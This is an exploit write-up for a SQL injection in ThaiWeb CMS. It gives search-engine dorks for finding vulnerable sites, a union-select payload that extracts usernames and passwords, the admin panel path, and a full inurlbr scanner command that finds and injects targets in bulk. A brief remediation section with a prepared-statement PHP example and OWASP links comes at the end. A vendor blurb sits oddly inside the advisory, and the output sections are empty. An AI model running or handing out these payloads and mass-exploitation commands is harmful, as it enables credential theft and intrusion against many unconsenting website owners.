Exploring the ThaiWeb CMS SQL injection, then using the inurlbr scanner for mass exploitation.
We are located in Bangkok, Thailand. Our systems are based on UNIX and an open-source approach.
We believe in sharing knowledge, and we hope our knowledge will help everyone develop and reach a higher standard.
We hope to see Thai web builders upgrade themselves to become professionals living in the big international world of the internet.
Flaw discovery by:
Iran Cyber Security Group - Pi.Hack (www.Iran-Cyber.Org)
Description:
The vulnerability is located in the id_run value of the `index.php` file. Remote attackers are able to execute their own SQL commands by manipulating the GET request with the vulnerable id_run parameter. The request method used to inject the SQL command is GET, and the location of the issue is application-side.
References (Source):
http://www.vulnerability-lab.com/get_content.php?id=1555
Release Date:
2015-07-23
Vulnerability Laboratory ID (VL-ID):
1555
Common Vulnerability Scoring System:
8.6
Vendor Homepage:
http://www.thaiweb.net/
Google Dork:
"Powered by ThaiWeb"
"Reserved. Powered by Thaiweb."
inurl:"index.php" "Powered by Thaiweb"
PoC:
- http://target/index.php?Content=product&id_run=[ID]'[SQL INJECTION VULNERABILITY!]
- http://target/index.php?Content=product&id_run=-12+union+select+1,2,3,group_concat%28user,0x3a,pws%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user--
Admin Page:
www.target.com/_adminP/
Using inurlbr scanner for mass exploitation:
Download script: https://github.com/googleinurl/SCANNER-INURLBR
- Creating our command
SET DORK:
--dork 'YOUR_DORK'
OR
--dork-file 'YOUR_DORK_FILE.txt'
SET SEARCH ENGINES:
-q all
We will use all the search engines available in the script (the -q option selects the search engine, as in the full command below; -a is the validation string).
SET FILTER RESULTS:
--unique
Filters results to unique domains.
Removes all GET parameters from the URL.
SET OUTPUT FILE:
-s ThaiWeb.txt
SET TYPE VALIDATION:
-t 2
Type 2 tries to validate the error defined by: -a 'VALUE_INSIDE_THE_TARGET'
It also establishes a connection with the exploit through the GET method.
SET EXPLOIT REQUEST - GET:
--exploit-get {YOUR_GET}
Before setting the exploit we need to manipulate its string; for that we use an internal function of the inurlbr scanner to pass a validation string within the SQL injection, so that vulnerable targets can be separated from the rest.
Internal function - Converting strings to hexadecimal
hex: encodes values in hex.
Example: hex({value})
Usage: hex(102030)
Usage: --exploit-get 'user?id=hex(102030)'
Resulting injection:
http://www.target.gov.br/user?id=313032303330
--exploit-get '/index.php?Content=product&id_run=-12+union+select+1,2,3,group_concat%28user,0xhex(:),pws,0xhex(:),0xhex(inurlbr_vuln)%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user'
hex(inurlbr_vuln) = 696e75726c62725f76756c6e
hex(:) = 3a
Example injection:
http://www.target.gov.br/index.php?Content=product&id_run=-12+union+select+1,2,3,group_concat%28user,0x3a,pws,0x3a,0x696e75726c62725f76756c6e%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user
SET STRING VALIDATION:
Specify the string that will be used on the search script:
Example: -a {string}
Usage: -a '<title>hello world</title>'
If the specified value is found in the target, it is considered vulnerable.
Setting: -a 'inurlbr_vuln'
Let's validate the string "inurlbr_vuln", since it was passed within the SQLi exploit; if that value appears on our target, the injection was successful.
OUTPUT PRINT:
ADMIN PANEL:
COMMAND FULL:
php inurlbr.php --dork '"Powered by ThaiWeb"' -s ThaiWeb.txt -q all -t 2 --unique -a 'inurlbr_vuln' --exploit-get '/index.php?Content=product&id_run=-12+union+select+1,2,3,group_concat%28user,0xhex(:),pws,0xhex(:),0xhex(inurlbr_vuln)%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user'
OUTPUT PRINT:
Source discovery:
http://seclists.org/fulldisclosure/2015/Jul/109
Solution - Fix & Patch:
The security vulnerability can be patched by securely parsing and encoding the vulnerable id_run parameter value in the index.php file.
Restrict the input and use a prepared statement to secure the SQL statement requested via the GET method.
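As an added example (not ThaiWeb's code), the fix described above applied to the id_run lookup: the value is validated as an integer and then bound with a PDO prepared statement, so the PoC payload from this page is rejected before any SQL is built. The `product` table, its columns and the in-memory SQLite database are assumptions constructed for the demo.

```php
<?php
// Added example, not the CMS's own code. Assumes a `product` table with
// id_run and name columns; the in-memory SQLite schema below is constructed.

// Vulnerable pattern (shown for contrast, never executed here): the raw GET
// value is concatenated into the query text, so a value such as
// "-12 union select ..." becomes part of the SQL statement itself.
//   $sql = "SELECT name FROM product WHERE id_run = " . $_GET['id_run'];

function fetchProduct(PDO $db, $idRun): ?array
{
    // 1. Restrict the input: id_run must be a positive integer. Anything
    //    else (quotes, keywords, a union payload) is rejected before any SQL.
    $id = filter_var($idRun, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    // 2. Prepared statement: the value travels as a bound parameter, never
    //    as SQL text, so the database cannot interpret it as a command.
    $stmt = $db->prepare('SELECT id_run, name FROM product WHERE id_run = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed sample data standing in for the CMS database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE product (id_run INTEGER PRIMARY KEY, name TEXT)');
$db->exec("INSERT INTO product VALUES (12, 'Widget'), (13, 'Gadget')");

// A legitimate id, the page's PoC-style payload, and a quoted value:
// only the first one reaches the database.
$inputs = [
    '12',
    "-12 union select 1,2,3,group_concat(user,0x3a,pws),5 from user--",
    "12'",
];
foreach ($inputs as $input) {
    $row = fetchProduct($db, $input);
    echo $row === null ? "rejected by validation\n" : "found: {$row['name']}\n";
}
```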
How to Avoid SQL Injection Vulnerabilities
See the OWASP SQL Injection Prevention Cheat Sheet.
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
See the OWASP Query Parameterization Cheat Sheet.
https://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheet
See the OWASP Guide article on how to Avoid SQL Injection Vulnerabilities.
https://www.owasp.org/index.php/Category:OWASP_Guide_Project
https://www.owasp.org/index.php/Guide_to_SQL_Injection
How to Review Code for SQL Injection Vulnerabilities
See the OWASP Code Review Guide article on how to Review Code for SQL Injection Vulnerabilities.
https://www.owasp.org/index.php/Category:OWASP_Code_Review_Project
https://www.owasp.org/index.php/Reviewing_Code_for_SQL_Injection
How to Test for SQL Injection Vulnerabilities
See the OWASP Testing Guide article on how to Test for SQL Injection Vulnerabilities.
https://www.owasp.org/index.php/Category:OWASP_Testing_Project
https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)